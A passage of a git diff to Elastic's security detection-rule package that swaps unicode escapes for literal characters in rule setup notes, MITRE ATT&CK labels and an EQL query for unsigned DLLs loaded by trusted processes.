+++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_103.json 
@@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_104.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_104.json index 97829ad4cc6..e7b78a2b5c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_104.json 
@@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_105.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_105.json index c6096af24b7..b18b2d922d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_105.json 
@@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_106.json b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_106.json index 79616ce880a..e4650d9b148 100644 --- a/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d_106.json 
@@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_103.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_103.json index ae916399c13..b00685f42d5 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_103.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_104.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_104.json index 1e09612705b..b681930d1c0 100644 
--- a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_104.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_105.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_105.json index 2b2ac14813a..87f6ce975f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_105.json 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_106.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_106.json index bd0909a20a8..5ff556c7ccd 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_106.json 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_107.json b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_107.json index 2ce0aa5550d..e51212be915 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c0429aa8-9974-42da-bfb6-53a0a515a145_107.json 
@@ -49,7 +49,7 @@ ], "risk_score": 21, "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c0b9dc99-c696-4779-b086-0d37dc2b3778_1.json b/packages/security_detection_engine/kibana/security_rule/c0b9dc99-c696-4779-b086-0d37dc2b3778_1.json index dbf684ccfa1..b34fab06ce9 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0b9dc99-c696-4779-b086-0d37dc2b3778_1.json +++ b/packages/security_detection_engine/kibana/security_rule/c0b9dc99-c696-4779-b086-0d37dc2b3778_1.json 
@@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_100.json b/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_100.json index 597284a9ebf..613113b2216 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_100.json +++ b/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_100.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_101.json b/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_101.json index ab77779aeeb..2981696bebd 100644 --- a/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c0be5f31-e180-48ed-aa08-96b36899d48f_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_1.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_1.json index 97b15dace99..e244e685513 100644 --- a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_1.json 
+++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_2.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_2.json index 24381df9703..d93aea86a74 100644 --- a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_2.json +++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_2.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_3.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_3.json index cebd5ce63ea..5385c8b01f0 100644 --- a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_3.json +++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_3.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_4.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_4.json index b1826b42fe2..daa83733b1c 100644 --- a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_4.json +++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_4.json 
@@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_5.json b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_5.json index 62a0f06a010..65c0f031d63 100644 --- a/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_5.json +++ b/packages/security_detection_engine/kibana/security_rule/c125e48f-6783-41f0-b100-c3bf1b114d16_5.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_102.json b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_102.json index 07518a6398d..d817c36bab7 100644 --- a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_103.json b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_103.json index 146d0f8e8bc..0bfb3ce4d6f 100644 --- a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_103.json 
+++ b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_104.json b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_104.json index 4b4d369e542..ea2ec93d1ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_205.json b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_205.json index 3ae99f7c48c..ea1098e58a3 100644 --- a/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_205.json +++ b/packages/security_detection_engine/kibana/security_rule/c1812764-0788-470f-8e74-eb4a14d47573_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", 
diff --git a/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_1.json b/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_1.json index b85c97ab7bf..008fa47d3df 100644 --- a/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_1.json +++ b/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by a Trusted Process", - "query": "library where host.os.type == \"windows\" and\n (dll.Ext.relative_file_creation_time \u003c= 500 or\n dll.Ext.relative_file_name_modify_time \u003c= 500 or\n dll.Ext.device.product_id : (\"Virtual DVD-ROM\", \"Virtual Disk\")) and dll.hash.sha256 != null and\n process.code_signature.status :\"trusted\" and not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n /* DLL loaded from the process.executable current directory */\n endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n and not user.id : \"S-1-5-18\"\n", + "query": "library where host.os.type == \"windows\" and\n (dll.Ext.relative_file_creation_time <= 500 or\n dll.Ext.relative_file_name_modify_time <= 500 or\n dll.Ext.device.product_id : (\"Virtual DVD-ROM\", \"Virtual Disk\")) and dll.hash.sha256 != null and\n process.code_signature.status :\"trusted\" and not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n /* DLL loaded from the process.executable current directory */\n endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n and not user.id : \"S-1-5-18\"\n", "related_integrations": [ { "package": "endpoint", 
@@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_101.json b/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_101.json index 4c9326c2465..7b7a3a3ec57 100644 --- a/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c20cd758-07b1-46a1-b03f-fa66158258b8_101.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by a Trusted Process", - "query": "library where host.os.type == \"windows\" and\n (dll.Ext.relative_file_creation_time \u003c= 500 or\n dll.Ext.relative_file_name_modify_time \u003c= 500 or\n dll.Ext.device.product_id : (\"Virtual DVD-ROM\", \"Virtual Disk\")) and dll.hash.sha256 != null and\n process.code_signature.status :\"trusted\" and not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n /* DLL loaded from the process.executable current directory */\n endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n and not user.id : \"S-1-5-18\"\n", + "query": "library where host.os.type == \"windows\" and\n (dll.Ext.relative_file_creation_time <= 500 or\n dll.Ext.relative_file_name_modify_time <= 500 or\n dll.Ext.device.product_id : (\"Virtual DVD-ROM\", \"Virtual Disk\")) and dll.hash.sha256 != null and\n process.code_signature.status :\"trusted\" and not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n /* DLL loaded from the process.executable current directory */\n endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n and not user.id : \"S-1-5-18\"\n", "related_integrations": [ { "package": "endpoint", @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_104.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_104.json index 59a09ad5ff8..b6716625e73 100644 
--- a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_104.json @@ -60,7 +60,7 @@ ], "risk_score": 73, "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_105.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_105.json index b6a25e6f0b4..05f6813ba52 100644 --- a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_105.json 
@@ -60,7 +60,7 @@ ], "risk_score": 73, "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_106.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_106.json index 24219b89902..8020455ff3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_106.json 
@@ -60,7 +60,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_107.json b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_107.json
index 9569d89e71e..359f020f914 100644
--- a/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/c25e9c87-95e1-4368-bfab-9fd34cf867ec_107.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
